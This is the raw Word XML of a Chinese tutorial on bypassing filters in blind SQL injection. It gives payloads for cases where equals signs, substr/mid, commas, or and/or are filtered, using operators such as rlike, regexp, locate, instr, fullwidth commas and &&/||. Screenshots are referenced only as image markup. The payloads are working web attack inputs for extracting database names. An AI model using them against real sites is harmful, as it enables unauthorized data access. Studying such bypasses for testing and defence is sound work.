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前言：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等号被过滤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采用，&gt;,&lt;,&lt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayload1(采用&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>and ascii(substr(database(),1,1))&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4269740" cy="210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4603" cy="2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55110" cy="2181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192" cy="21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可以得到第一个字母为t</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayload2(采用&lt;)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4153"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>and ascii(substr(database(),1,1))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;xxx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4153"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3784600" cy="2500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548" cy="250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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3785235" cy="232918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678" cy="23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可以判断为等于116对应的ascii为t</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayload3(采用&lt;&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>and ascii(substr(database(),1,1))&lt;&gt;115</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注：&lt;&gt;为不等于的意思相当于!=</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3975100" cy="28149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452" cy="2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30980" cy="2818765"/>
            <wp:effectExtent l="0" t="0" r="762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260" cy="282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bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用like，rlike语句</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayload1(like)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>and database() like '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>%'</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4065905" cy="20510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789" cy="20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943350" cy="19824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023" cy="19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P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayload2(rlike)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>and database() rlike '^te'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t>and database() rlike 't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e.*</w:t>
      </w:r>
      <w:r>
        <w:t>'</w:t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3355340" cy="2078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441" cy="20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  <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3331210" cy="22009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677" cy="2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360" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注：rlike的内容为正则，正则写法与java一致，需要转义，例如</w:t>
      </w:r>
      <w:r>
        <w:t>’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>需要使用</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\\n</w:t>
      </w:r>
      <w:r>
        <w:t>’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</w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>采用regexp,in,between</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayload1(regexp)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>and database() regexp 'test.*'</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>and database() regexp '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>^test</w:t>
      </w:r>
      <w:r>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5359"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>egexp函数使用方法与rlike类似，都是正则匹配</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5359"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3220085" cy="20935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091" cy="20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59"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3100705" cy="180975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2858" cy="1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59"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayload2(in)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5359"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>and database() in ('test')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5359"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4292600" cy="27266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249" cy="27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59"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5359"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5359"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5359"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5359"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>and instr(database(),'t')in(1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5359"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3728720" cy="2447290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219" cy="24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59"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayload3(</w:t>
      </w:r>
      <w:r>
        <w:t>BETWEEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5359"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5359"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>and substr(database(),1,1) BETWEEN 't' and 't'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5359"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3524250" cy="22580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926" cy="22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5359"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3575050" cy="2186305"/>
            <wp:effectExtent l="0" t="0" r="635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973" cy="218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S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubstr,mid等被过滤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用locate,position,instr</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayload1(locate)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>and LOCATE('e',database())in('2')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3355340" cy="20034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461" cy="20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and LOCATE('t',database(),4)in('4')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3523615" cy="200342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033" cy="200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rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>locate(str1,str2)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rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>str1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字符串在str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里第一次出现的位置，没有返回0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rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ocate(str1,str2,pos)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left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000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:eastAsia="宋体" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>str1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字符串在s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:eastAsia="宋体" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tr2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:eastAsia="宋体" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里pos（起始位置）出现的位置，没有返回0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:eastAsia="宋体" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:eastAsia="宋体" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pos必须大于第一次出现的位置，才能显示第二次出现的位置</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayload2(position)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>and position('t' in database())=1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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用法与locate类似，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>str1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字符串在str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>出现的位置，没有返回0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4142105" cy="2550795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426" cy="25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DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayload3(instr)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rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nd instr(database(),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4173855" cy="2082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3758" cy="20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/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逗号被过滤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用</w:t>
      </w:r>
      <w:r>
        <w:t>%EF%BC%8C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">and substr(database()%EF%BC%8C1%EF%BC%8C)='1' </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3307715" cy="2171065"/>
            <wp:effectExtent l="0" t="0" r="698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9567" cy="21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220085" cy="9385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6842" cy="9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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用from xx for xx,  from(x)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayload1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>and substr(database()from 2 for 1)='e'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2798445" cy="1737360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7632" cy="17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rPr>
          <w:rStyle w:val="13"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayload2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">nd </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">substr('abcde' from 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test</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2798445" cy="1947545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02353" cy="1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2798445" cy="161925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1305" cy="16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3014345" cy="20434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8927" cy="20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pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nd/or被过滤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用&amp;&amp;或者||</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;&amp; substr(database(),1,1)=</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3204210" cy="1694815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5290" cy="16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|| substr(database(),1,1)=</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3092450" cy="21907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815" cy="219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注：在mysql中 and与or 是可以用 &amp;&amp;和||相互代替的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如： and 1=1 -&gt;&amp;&amp; 1=1  or 1=1 -&gt;||1=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不过在oracle中，||为拼接字符，如：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||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-&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ab</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，相当于mysql中的concat（）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采用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jaVu Sans Mono">
    <w:panose1 w:val="020B0609030804020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern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E2623"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="306E26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53A"/>
    <w:rsid w:val="0005168D"/>
    <w:rsid w:val="001242EA"/>
    <w:rsid w:val="00125F25"/>
    <w:rsid w:val="00144B2E"/>
    <w:rsid w:val="001949BA"/>
    <w:rsid w:val="001D2802"/>
    <w:rsid w:val="001E793A"/>
    <w:rsid w:val="002226BE"/>
    <w:rsid w:val="00261095"/>
    <w:rsid w:val="00297094"/>
    <w:rsid w:val="00330A68"/>
    <w:rsid w:val="00334F4C"/>
    <w:rsid w:val="003627F1"/>
    <w:rsid w:val="003A6AF0"/>
    <w:rsid w:val="003C766F"/>
    <w:rsid w:val="0044713A"/>
    <w:rsid w:val="005028B7"/>
    <w:rsid w:val="00575B32"/>
    <w:rsid w:val="0059232C"/>
    <w:rsid w:val="005A77C9"/>
    <w:rsid w:val="006A474E"/>
    <w:rsid w:val="0070771D"/>
    <w:rsid w:val="00712C97"/>
    <w:rsid w:val="0071353A"/>
    <w:rsid w:val="00764925"/>
    <w:rsid w:val="007A5C1A"/>
    <w:rsid w:val="008804E1"/>
    <w:rsid w:val="008A3ABC"/>
